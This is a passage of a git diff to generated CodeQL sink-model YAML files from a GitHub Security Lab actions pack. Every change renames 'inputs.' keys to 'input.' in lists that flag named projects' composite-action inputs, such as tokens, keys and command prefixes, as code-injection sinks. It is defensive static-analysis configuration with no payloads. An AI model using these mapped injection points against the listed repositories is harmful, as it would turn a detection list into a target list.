15de610c9812..ac72bb9ebf04 100644 --- a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aws/amazon-vpc-cni-k8s", "*", "inputs.go-package", "code-injection", "generated"] - - ["aws/amazon-vpc-cni-k8s", "*", "inputs.work-dir", "code-injection", "generated"] \ No newline at end of file + - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"] + - ["aws/amazon-vpc-cni-k8s", "*", "input.work-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml index ad6e7e806cd0..b3f1ca67eef7 100644 --- a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aws/karpenter-provider-aws", "*", "inputs.account_id", "code-injection", "generated"] - - ["aws/karpenter-provider-aws", "*", "inputs.cluster_name", "code-injection", "generated"] \ No newline at end of file + - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"] + - ["aws/karpenter-provider-aws", "*", "input.cluster_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml index 67631102d71f..44f5ad660960 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["awslabs/amazon-eks-ami", "*", "inputs.max_resource_age_duration", "code-injection", "generated"] - - ["awslabs/amazon-eks-ami", "*", "inputs.aws_region", "code-injection", "generated"] - - ["awslabs/amazon-eks-ami", "*", "inputs.ami_id", "code-injection", "generated"] - - ["awslabs/amazon-eks-ami", "*", "inputs.k8s_version", "code-injection", "generated"] - - ["awslabs/amazon-eks-ami", "*", "inputs.os_distro", "code-injection", "generated"] - - ["awslabs/amazon-eks-ami", "*", "inputs.additional_arguments", "code-injection", "generated"] - - ["awslabs/amazon-eks-ami", "*", "inputs.build_id", "code-injection", "generated"] \ No newline at end of file + - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.aws_region", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.ami_id", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.k8s_version", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.os_distro", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.additional_arguments", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.build_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml index 098d7c139fa5..c2e56f7e175c 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["awslabs/aws-lambda-rust-runtime", "*", "inputs.package", "code-injection", "generated"] \ No newline at end of file + - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml index def12e487410..54d0c8b2fe09 100644 --- a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["azerothcore/azerothcore-wotlk", "*", "inputs.CXX", "code-injection", "generated"] - - ["azerothcore/azerothcore-wotlk", "*", "inputs.CC", "code-injection", "generated"] \ No newline at end of file + - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"] + - ["azerothcore/azerothcore-wotlk", "*", "input.CC", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml index 768db7317cc3..b1914e7a96b5 100644 --- a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["azure/azure-datafactory", "*", "inputs.directory", "code-injection", "generated"] - - ["azure/azure-datafactory", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"] + - ["azure/azure-datafactory", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml index 55218009c022..dd66f206ee99 100644 --- a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["badges/shields", "*", "inputs.npm-version", "code-injection", "generated"] \ No newline at end of file + - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml index 17ec5471e85c..0c26f02e6d86 100644 --- a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["balena-io/etcher", "*", "inputs.VERBOSE", "code-injection", "generated"] \ No newline at end of file + - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml index 55cd8b18241d..2ee13115d6d9 100644 --- a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["balena-os/balena-engine", "*", "inputs.VERBOSE", "code-injection", "generated"] \ No newline at end of file + - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml index 328d58d9e42b..c76ed5b66045 100644 --- a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ben-manes/caffeine", "*", "inputs.attempt-delay", "code-injection", "generated"] - - ["ben-manes/caffeine", "*", "inputs.attempt-limit", "code-injection", "generated"] - - ["ben-manes/caffeine", "*", "inputs.arguments", "code-injection", "generated"] - - ["ben-manes/caffeine", "*", "inputs.graal", "code-injection", "generated"] - - ["ben-manes/caffeine", "*", "inputs.java", "code-injection", "generated"] \ No newline at end of file + - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.attempt-limit", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.arguments", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.graal", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.java", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml index 836bda1041ad..0bdf2087b46a 100644 --- a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bokeh/bokeh", "*", "inputs.test-env", "code-injection", "generated"] \ No newline at end of file + - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml index b6f9ee027f1f..bb83a5964e7c 100644 --- a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["botpress/botpress", "*", "inputs.tilt_cmd", "code-injection", "generated"] \ No newline at end of file + - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml index 2f6458219b62..f29c52b1bf5b 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["braintree/braintree-android-drop-in", "*", "inputs.version", "code-injection", "generated"] - - ["braintree/braintree-android-drop-in", "*", "inputs.signing_file_path", "code-injection", "generated"] - - ["braintree/braintree-android-drop-in", "*", "inputs.signing_key_file", "code-injection", "generated"] \ No newline at end of file + - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "input.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "input.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml index 374a13ccd82d..43745006f8db 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["braintree/braintree/android", "*", "inputs.version", "code-injection", "generated"] - - ["braintree/braintree/android", "*", "inputs.module", "code-injection", "generated"] - - ["braintree/braintree/android", "*", "inputs.signing_file_path", "code-injection", "generated"] - - ["braintree/braintree/android", "*", "inputs.signing_key_file", "code-injection", "generated"] \ No newline at end of file + - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "input.module", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "input.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "input.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml index fb4608ec70be..9289afb744f9 100644 --- a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["broadinstitute/gatk", "*", "inputs.identifier", "code-injection", "generated"] - - ["broadinstitute/gatk", "*", "inputs.repo-path", "code-injection", "generated"] - - ["broadinstitute/gatk", "*", "inputs.CROMWELL_VERSION", "code-injection", "generated"] \ No newline at end of file + - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "input.repo-path", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "input.CROMWELL_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml index 3a6a4575d304..9729f9668138 100644 --- a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["canonical/multipass", "*", "inputs.release-tag-re", "code-injection", "generated"] - - ["canonical/multipass", "*", "inputs.release-branch-re", "code-injection", "generated"] \ No newline at end of file + - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] + - ["canonical/multipass", "*", "input.release-branch-re", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml index d21c609e5eda..92c259539443 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chia-network/actions", "*", "inputs.keypair_path", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.role_name", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.backend_name", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.vault_url", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.ttl", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.vault_token", "code-injection", "generated"] \ No newline at end of file + - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.role_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.backend_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.vault_url", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.ttl", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.vault_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml index 76c92f51d267..c572c11ada4b 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chia-network/chia-blockchain", "*", "inputs.command-prefix", "code-injection", "generated"] \ No newline at end of file + - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml index dc48b2e8d20e..1819f4f716e1 100644 --- a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chipsalliance/chisel", "*", "inputs.version", "code-injection", "generated"] - - ["chipsalliance/chisel", "*", "inputs.file-name", "code-injection", "generated"] \ No newline at end of file + - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] + - ["chipsalliance/chisel", "*", "input.file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml index b46b5592ac55..620100dd2d9a 100644 --- a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chocobozzz/peertube", "*", "inputs.deployKey", "code-injection", "generated"] - - ["chocobozzz/peertube", "*", "inputs.knownHosts", "code-injection", "generated"] \ No newline at end of file + - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] + - ["chocobozzz/peertube", "*", "input.knownHosts", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml index a38482ba6963..dfb08d260583 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cilium/cilium-cli", "*", "inputs.binary-name", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.binary-dir", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.ci-version", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.release-version", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.repository", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.go-mod-directory", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.local-path", "code-injection", "generated"] \ No newline at end of file + - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.binary-dir", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.ci-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.release-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.repository", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.go-mod-directory", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.local-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml index ca1bf2f894ff..a99ccc9e4776 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cilium/cilium", "*", "inputs.job-name", "code-injection", "generated"] - - ["cilium/cilium", "*", "inputs.lb-acceleration", "code-injection", "generated"] - - ["cilium/cilium", "*", "inputs.mutual-auth", "code-injection", "generated"] \ No newline at end of file + - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] + - ["cilium/cilium", "*", "input.lb-acceleration", "code-injection", "generated"] + - ["cilium/cilium", "*", "input.mutual-auth", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml index 4a46ca788e57..3a1e7b9d3366 100644 --- a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["citusdata/citus", "*", "inputs.flags", "code-injection", "generated"] - - ["citusdata/citus", "*", "inputs.pg_major", "code-injection", "generated"] - - ["citusdata/citus", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file + - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] + - ["citusdata/citus", "*", "input.pg_major", "code-injection", "generated"] + - ["citusdata/citus", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml index b1c5270165b7..c15c1fac0068 100644 --- a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["clerk/javascript", "*", "inputs.auth-email", "code-injection", "generated"] - - ["clerk/javascript", "*", "inputs.auth-password", "code-injection", "generated"] - - ["clerk/javascript", "*", "inputs.auth-user", "code-injection", "generated"] - - ["clerk/javascript", "*", "inputs.registry", "code-injection", "generated"] - - ["clerk/javascript", "*", "inputs.publish-cmd", "code-injection", "generated"] \ No newline at end of file + - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.auth-password", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.auth-user", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.registry", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.publish-cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml index 9fcaa3fff768..b0c787fa378f 100644 --- a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cloud-custodian/cloud-custodian", "*", "inputs.poetry-version", "code-injection", "generated"] - - ["cloud-custodian/cloud-custodian", "*", "inputs.bucket-url", "code-injection", "generated"] - - ["cloud-custodian/cloud-custodian", "*", "inputs.docs-dir", "code-injection", "generated"] - - ["cloud-custodian/cloud-custodian", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "input.bucket-url", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "input.docs-dir", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml index f21c3c1f9de2..86278889fdf1 100644 --- a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cloudflare/workers-sdk", "*", "inputs.package-manager", "code-injection", "generated"] \ No newline at end of file + - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml index 7ff68860cf83..4bf92a251235 100644 --- a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cloudfoundry/cloud_controller/ng", "*", "inputs.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file + - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml index 9e3d5bd41e32..79c13504faba 100644 --- a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["coder/coder", "*", "inputs.api-key", "code-injection", "generated"] \ No newline at end of file + - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml index 63373bd78a79..45ac61c8ef9d 100644 --- a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["coil-kt/coil", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file + - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml index 529614b8d79d..ce546fceb4bb 100644 --- a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["commaai/openpilot", "*", "inputs.sleep_time", "code-injection", "generated"] - - ["commaai/openpilot", "*", "inputs.docker_hub_pat", "code-injection", "generated"] - - ["commaai/openpilot", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] + - ["commaai/openpilot", "*", "input.docker_hub_pat", "code-injection", "generated"] + - ["commaai/openpilot", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml index ce3ce91d773a..b34c6d46da3a 100644 --- a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["conan-io/conan-center-index", "*", "inputs.files", "code-injection", "generated"] - - ["conan-io/conan-center-index", "*", "inputs.reviewers", "code-injection", "generated"] \ No newline at end of file + - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] + - ["conan-io/conan-center-index", "*", "input.reviewers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml index ececaa835e94..f87e0c02529c 100644 --- a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["corretto/corretto-8", "*", "inputs.version-branch", "code-injection", "generated"] - - ["corretto/corretto-8", "*", "inputs.upstream", "code-injection", "generated"] - - ["corretto/corretto-8", "*", "inputs.merge-branch", "code-injection", "generated"] - - ["corretto/corretto-8", "*", "inputs.local-branch", "code-injection", "generated"] \ No newline at end of file + - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "input.upstream", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "input.merge-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "input.local-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml index 0c19019e4f34..88348f05cd0d 100644 --- a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cosmos/cosmos-sdk", "*", "inputs.github_token", "code-injection", "generated"] \ No newline at end of file + - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml index 67a21fc2e86f..76fe3bed4729 100644 --- a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["coturn/coturn", "*", "inputs.SUDO", "code-injection", "generated"] \ No newline at end of file + - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml index 3f0c5e645de4..bf1a498d7a08 100644 --- a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["crunchydata/postgres-operator", "*", "inputs.k3s-channel", "code-injection", "generated"] \ No newline at end of file + - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml 